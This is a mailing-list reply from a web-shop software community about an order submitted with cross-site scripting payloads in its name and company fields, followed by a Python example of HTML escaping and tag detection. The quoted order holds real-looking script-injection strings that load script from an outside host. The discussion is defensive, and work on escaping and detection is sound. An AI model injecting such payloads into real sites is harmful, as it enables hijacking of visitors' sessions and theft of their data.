[ic] xss issue?

Josh Lavin jlavin at endpoint.com
Thu Sep 15 17:49:43 UTC 2016


Quoting DB (db at m-and-d.com):
> I received an order with stuff like this
> 
>             Name: Linda Juan">script src=//xss.re/692>/script>
>          Company: ">script src=//xss.re/692>/script>
>    Email address: juanlinda123 at gmail.com
> 
> I'm using 5.10 and a modified foundation. The payment method was
> check/money order. I'm hoping to prevent this of course. Adding a
> [filter] to input fields on the order form is the first thing that comes
> to mind. Is that a reasonable solution?

Actually, if your order report email is using the [value] tags, it
automatically escapes HTML.

See the last section on this page:
http://www.icdevgroup.org/interchange-doc-5.2.0/frames/ictags_120.html

For reference, here is the default Strap order report:
https://github.com/interchange/interchange/blob/master/dist/strap/etc/report

You may need to compare to what your site is using.

Using [value] will prevent XSS, but to prevent the submissions
altogether is another story... You'd probably need to have an "online"
check payment option, so that at least the orders that make it through
would be using a real bank account (or a stolen one!).

-- 
Josh Lavin
End Point Corporation
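
As an added illustration (not Interchange's own code, and not from either message in this thread): a Python stand-in for what an HTML-escaping [value] tag does to these order fields, beside the input-side check DB asked about. The order, the payload URL and the field names are constructed, and `html.escape` is assumed to be a fair proxy for the tag's escaping.

```python
import html
import re

# Constructed order modelled on the submission in the thread; the script URL is a placeholder.
SAMPLE_ORDER = {
    "fname": 'Linda Juan"><script src=//example.invalid/x></script>',
    "company": '"><script src=//example.invalid/x></script>',
    "email": "juanlinda123@example.invalid",
}

# Minimal HTML order report, standing in for the report template.
REPORT_TEMPLATE = (
    "<table>\n"
    "<tr><td>Name:</td><td>{fname}</td></tr>\n"
    "<tr><td>Company:</td><td>{company}</td></tr>\n"
    "<tr><td>Email:</td><td>{email}</td></tr>\n"
    "</table>\n"
)

def escape_field(value: str) -> str:
    """Escape one form value as an escaping [value] tag would: &, <, >, "
    and ' become entities, so the text can neither close the surrounding
    attribute or element nor open a new one."""
    return html.escape(value, quote=True)

def render_report(order: dict, escape: bool = True) -> str:
    """Render the report. escape=False reproduces the unsafe case where raw
    submitted values are interpolated straight into markup."""
    fields = {k: (escape_field(v) if escape else v) for k, v in order.items()}
    return REPORT_TEMPLATE.format(**fields)

# Anything shaped like an HTML tag; name/company fields have no legitimate use for markup.
TAG_RE = re.compile(r"<\s*/?\s*[a-zA-Z][^>]*>")

def suspicious_fields(order: dict) -> list:
    """Input-side check (the [filter] idea from the question): names of
    fields containing tag-like content, so the order can be held for review
    rather than accepted automatically."""
    return [k for k, v in order.items() if TAG_RE.search(v)]
```

Output-side escaping is what stops the script from running in the report; the input-side check only helps decide which orders to hold.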
